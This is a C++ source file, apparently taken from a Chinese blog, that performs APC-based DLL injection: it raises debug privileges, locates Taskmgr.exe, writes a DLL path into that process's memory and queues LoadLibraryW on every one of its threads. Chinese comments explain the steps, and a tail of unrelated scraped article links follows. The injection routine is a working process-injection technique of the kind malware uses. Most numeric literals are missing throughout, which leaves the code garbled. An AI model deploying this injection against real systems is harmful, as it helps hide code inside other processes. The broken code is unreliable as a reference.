// InjectAPC.cpp : 定义控制台应用程序的入口点。

 //

 #include "stdafx.h"

 #include <Windows.h>

 #include <iostream>

 #include <vector>

 #include <TlHelp32.h>

 using namespace std;

 BOOL GrantPrivileges(WCHAR* PrivilegeName);

 BOOL GetProcessIDByProcessImageName(IN WCHAR* wzProcessImageName, OUT UINT32* TargetProcessID);

 BOOL GetThreadIDByProcessID(UINT32 ProcessID, vector<UINT32>& ThreadIDVector);

 BOOL Inject(UINT32 ProcessID, UINT32 ThreadID);

 WCHAR DllFullPath[MAX_PATH] = {  };

 PVOID DllFullPathBufferData = NULL;

 int main()

 {

     if(GrantPrivileges(SE_DEBUG_NAME)==FALSE)

     {

         printf("GrantPrivilege Error\r\n");

     }

     UINT32 ProcessID = ;

     GetCurrentDirectory(MAX_PATH, DllFullPath);

     wcscat(DllFullPath, L"\\Dll.dll");

     //getchar();

     //printf("%S\r\n", DllFullPath);

 #ifdef _WIN64

     GetProcessIDByProcessImageName(L"Taskmgr.exe", &ProcessID);

 //    GetProcessIDByProcessImageName(L"explorer.exe", &ProcessID);

 #else

     GetProcessIDByProcessImageName(L"Taskmgr.exe", &ProcessID);

 #endif

     vector<UINT32> ThreadIDVector;

     //printf("%d\r\n", ProcessID);

     GetThreadIDByProcessID(ProcessID, ThreadIDVector);

     UINT32 ThreadID = ;

     while (!ThreadIDVector.empty())

     {

         ThreadID = ThreadIDVector.back();

         Inject(ProcessID, ThreadID);

         ThreadIDVector.pop_back();

     }

     /*size_t ThreadCount = ThreadIDVector.size();

     for (INT_PTR i = ThreadCount - 1; i >= 0; i--)

     {

         UINT32 ThreadID = ThreadIDVector[i];

         Inject(ProcessID, ThreadID);

     }*/

     getchar();

     return ;

 }

 //提高的是自己的权限,提成自己想要的。

 BOOL GrantPrivileges(WCHAR* PrivilegeName)

 {

     HANDLE TokenHandle = NULL;

     TOKEN_PRIVILEGES PrivilegesToken;

     LUID v1;

     //打开权限令牌

     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &TokenHandle))

     {

         return FALSE;

     }

     if (!LookupPrivilegeValue(NULL, PrivilegeName, &v1))

     {

         CloseHandle(TokenHandle);

         return FALSE;

     }

     PrivilegesToken.PrivilegeCount = ;

     PrivilegesToken.Privileges[].Luid = v1;

     PrivilegesToken.Privileges[].Attributes = SE_PRIVILEGE_ENABLED;

     //调整权限                    //特权启用.    特权被用来访问一个对象或服务

     if (!AdjustTokenPrivileges(TokenHandle, FALSE, &PrivilegesToken, sizeof(PrivilegesToken), NULL, NULL))

     {

         CloseHandle(TokenHandle);

         TokenHandle = NULL;

         return false;

     }

     //启用特权

     CloseHandle(TokenHandle);

     return TRUE;

 }

 //做好放的笔记里

 BOOL GetProcessIDByProcessImageName(IN WCHAR * wzProcessImageName, OUT UINT32 * TargetProcessID)

 {

     HANDLE ProcessSnapshotHandle = NULL;    //1.初始化

     ProcessSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, );

     //一个班的学生

     if (ProcessSnapshotHandle == INVALID_HANDLE_VALUE)

     {

         return FALSE;

     }

     PROCESSENTRY32 ProcessEntry32 = {  }; //用来存放快照进程信息的一个结构体

     ProcessEntry32.dwSize = sizeof(PROCESSENTRY32);//初始化PROCESSENTRY结构

     Process32First(ProcessSnapshotHandle, &ProcessEntry32);    //把第一个进程 放在结构体中

     do

     {

         if (lstrcmpi(ProcessEntry32.szExeFile, wzProcessImageName)==) //不区分大小写

         {                    //进程的名称

             *TargetProcessID = ProcessEntry32.th32ProcessID;

             break;

         }

     } while (Process32Next(ProcessSnapshotHandle, &ProcessEntry32));

     //printf("%d\r\n", *TargetProcessID);

     CloseHandle(ProcessSnapshotHandle);

     ProcessSnapshotHandle = NULL;

     return TRUE;

     return ;

 }

 //枚举对方的指定进程ID的所有线程,压入vector中,返回线程集合

 BOOL GetThreadIDByProcessID(UINT32 ProcessID, vector<UINT32>& ThreadIDVector)

 {

     HANDLE ThreadSnapshotHandle = NULL;

     THREADENTRY32 ThreadEntry32 = {  };

     ThreadEntry32.dwSize = sizeof(THREADENTRY32);

     ThreadSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, );

     if (ThreadSnapshotHandle == INVALID_HANDLE_VALUE)            //指定将要快照的进程ID。如果该参数为0表示快照当前进程。该参数只有在设置了TH32CS_SNAPHEAPLIST或者TH32CS_SNAPMODULE后才有效,

     {                                                            //在其他情况下该参数被忽略,所有的进程都会被快照。所以不用修改0为ProcessID。

         return FALSE;

     }

     BOOL bOk = Thread32First(ThreadSnapshotHandle, &ThreadEntry32);

     if (bOk)

     {

         do

         {

             if (ThreadEntry32.th32OwnerProcessID == ProcessID)

             {

                 ThreadIDVector.emplace_back(ThreadEntry32.th32ThreadID); //怀疑可能push.back枚举可以

             }

         } while (Thread32Next(ThreadSnapshotHandle, &ThreadEntry32));

     }

     CloseHandle(ThreadSnapshotHandle);

     ThreadSnapshotHandle = NULL;

     return TRUE;

 }

 BOOL Inject(UINT32 ProcessID, UINT32 ThreadID)

 {

     HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);

     HANDLE ThreadHandle = INVALID_HANDLE_VALUE;

     //

     SIZE_T ReturnLength = ;

     size_t DllFullPathLength = wcslen(DllFullPath) + ;

     if (DllFullPathBufferData == NULL)

     {

         //在对方进程空间申请内存,存储Dll完整路径。

         DllFullPathBufferData = VirtualAllocEx(ProcessHandle, NULL, DllFullPathLength * , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

         if (DllFullPathBufferData == NULL)

         {

             CloseHandle(ProcessHandle);

             CloseHandle(ThreadHandle);

             return FALSE;

         }

     //将DllFullPath写进刚刚申请的内存中                                                        size是双字长度

         BOOL bOk = WriteProcessMemory(ProcessHandle, DllFullPathBufferData, DllFullPath, DllFullPathLength*,

             &ReturnLength);

         if (bOk == FALSE)

         {

             VirtualFreeEx(ProcessHandle,DllFullPathBufferData,(DllFullPathLength * ), MEM_RELEASE);

             CloseHandle(ProcessHandle);

             CloseHandle(ThreadHandle);

             return FALSE;

         }

     }

     UINT_PTR LoadLibraryAddress = (UINT_PTR)GetProcAddress(GetModuleHandle(L"Kernel32.dll"),"LoadLibraryW");

     //当前进程中获得导入模块Kernel32基地址

     //Kernel32模块中的导出表中获得函数LoadLibraryW

     /*

     为什么这里用导出表中的地址LoadLibraryW不用导入表中的函数地址?

     LoadLibraryW 当前进程导入表中的地址 比如 LoadLibraryW = 0x1234   0x1234 -->0x7564 相当于 0x1234[0x7564]

     1.防止中一种病毒叫Hook IAT(ImportAddressTable) Hook

     中这种病毒,修改了Kernel 地址 0x7564,这样寻不到址

     2.确保地址OK

     */

     if (LoadLibraryAddress == NULL)

     {

         VirtualFreeEx(ProcessHandle, DllFullPathBufferData, (DllFullPathLength * ), MEM_RELEASE);

         CloseHandle(ProcessHandle);

         return FALSE;

     }

     _try

     {

         ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadID);

         QueueUserAPC((PAPCFUNC)LoadLibraryAddress,ThreadHandle,(UINT_PTR)DllFullPathBufferData);

                                 //LoadLibraryAddress(DllFullPathBufferData)

     }

     _except(EXCEPTION_CONTINUE_EXECUTION)

     {

     }

     CloseHandle(ProcessHandle);

     CloseHandle(ThreadHandle);

     return ;

 }

卷珠帘

InjectAPC全部项目(Win32和Win64位)的更多相关文章

  1. 【转】win32,win64编程永恒;语言编程需要注意的64位和32机器的区别

    原文网址:http://www.cnblogs.com/kex1n/archive/2010/10/06/1844737.html 一.数据类型特别是int相关的类型在不同位数机器的平台下长度不同.C ...

  2. win64位安装python-mysqldb1.2.5

    在其他版本的mysqldb里面时间查询有问题最后确定还是在 1.2.5 版本下来解决,需要解决的问题就是这个:"Cannot open include file: 'config-win.h ...

  3. 在win64位,python64位2.7版本中安装pyHook

    今天看了一篇博文说的是利用pyhook监听键盘鼠标事件(感兴趣的可以看博客园中相关文章),文章中使用的pyHook模块的官方下载地址是:http://sourceforge.net/projects/ ...

  4. 32位vs2010的项目如何在64位系统上运行

    64位注册 1. 关闭Visual Studio.2. 在Visual Studio Tools目录,以管理员身份运行Visual Studio Command Prompt (2010),[注:这个 ...

  5. [Java 泥水匠] Java Components 之二:算法篇之项目实践中的位运算符(有你不懂的哦)

    作者:泥沙砖瓦浆木匠网站:http://blog.csdn.net/jeffli1993个人签名:打算起手不凡写出鸿篇巨作的人,往往坚持不了完成第一章节. 交流QQ群:[编程之美 365234583] ...

  6. win64位安装python-mysqldb1.2.3

    在其他版本的mysqldb里面时间查询有问题最后确定还是在 1.2.5 版本下来解决,需要解决的问题就是这个:“Cannot open include file: 'config-win.h': No ...

  7. access 驱动在win64位出现问题

    如果是调试的话,将应用程序池的 启动win32应用程序池 为 true

  8. 【C/C++开发】【VS开发】win32位与x64位下各类型长度对比

    64 位的优点:64 位的应用程序可以直接访问 4EB 的内存和文件大小最大达到4 EB(2 的 63 次幂):可以访问大型数据库.本文介绍的是64位下C语言开发程序注意事项. 1. 32 位和 64 ...

  9. win64位 apache2.4 php5.4 mysql5.6

    apache2.4 php5.4 mysql5.6 源文件下载 +以前的配置数据参考 链接:http://pan.baidu.com/s/1skfmGyT 密码:hqtp 比较好的参考资料 http: ...

随机推荐

  1. chrom 快捷键 整理版

    chrome窗口和标签页快捷键: Ctrl+N 打开新窗口 Ctrl+T 打开新标签页 Ctrl+Shift+N 在隐身模式下打开新窗口 Ctrl+O,然后选择文件 在谷歌浏览器中打开计算机上的文件 ...

  2. Android View的事件分发

    如果接触android开发时间足够长的话,或多或少都会遇到各种各样事件冲突的问题,要想解决这类问题,对深入理解事件分发机制是很有必要的,接下来几天都会尽自己所能尽可能将这方面讲清楚.  View的事件 ...

  3. hdu1025

    #include<stdio.h>const int MAXN=500010;int a[MAXN],b[MAXN]; //用二分查找的方法找到一个位置,使得num>b[i-1] 并 ...

  4. 抢红包算法 java

    抢红包的需求分析 抢红包的场景有点像秒杀,但是要比秒杀简单点.因为秒杀通常要和库存相关.而抢红包则可以允许有些红包没有被抢到,因为发红包的人不会有损失,没抢完的钱再退回给发红包的人即可.另外像小米这样 ...

  5. 第四节,Linux基础命令

    第四节,Linux基础命令 命令是系统操作员对系统传入的指令,传入指令后回车,系统接收到指令做出相应的行为 1.查看用户位于系统什么位置 [pmd]检查操作用户位于系统的什么位置 命令         ...

  6. PAT 团体程序设计天梯赛-练习集 L1-002. 打印沙漏

    本题要求你写个程序把给定的符号打印成沙漏的形状.例如给定17个“*”,要求按下列格式打印 ***** *** * *** ***** 所谓“沙漏形状”,是指每行输出奇数个符号:各行符号中心对齐:相邻两 ...

  7. CSS3的基础知识点

    面临找工作之际,又将CSS3的基础知识撸了一把,做了相应的笔记,主要是方便自己查阅,参考的是W3C的知识.    1.CSS背景 (1).background-size 属性 background-s ...

  8. hdu_5286_wyh2000 and sequence(分块)

    题目链接:hdu_5286_wyh2000 and sequence 题意: 给一段长度为N的序列,每次询问l-r(l和r和上一次询问的答案有关)内 不同的数的 出现次数的次方 的和.强制在线 题解: ...

  9. ejabberd模块开发

    参考: http://anders.conbere.org/journal/ http://www.process-one.net/en/wiki/ejabberd_module_developmen ...

  10. 第二部分 职责型模式responsibility

    普通职责无法提供的内容,据此可以定义以下几种模式: 将职责集中到某个类的一个单独实例,单件模式 当一个对象发生改变时,依赖于这个对象的其他对象都能够得到通知,而这个发生改变的对象无须了解自己被其他哪些 ...